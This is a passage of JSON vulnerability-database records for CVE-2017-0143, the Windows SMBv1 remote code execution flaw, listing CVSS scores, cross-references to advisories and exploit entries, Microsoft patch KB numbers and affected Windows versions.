SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f34700f5fafe59f3b729f742aac31bd5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 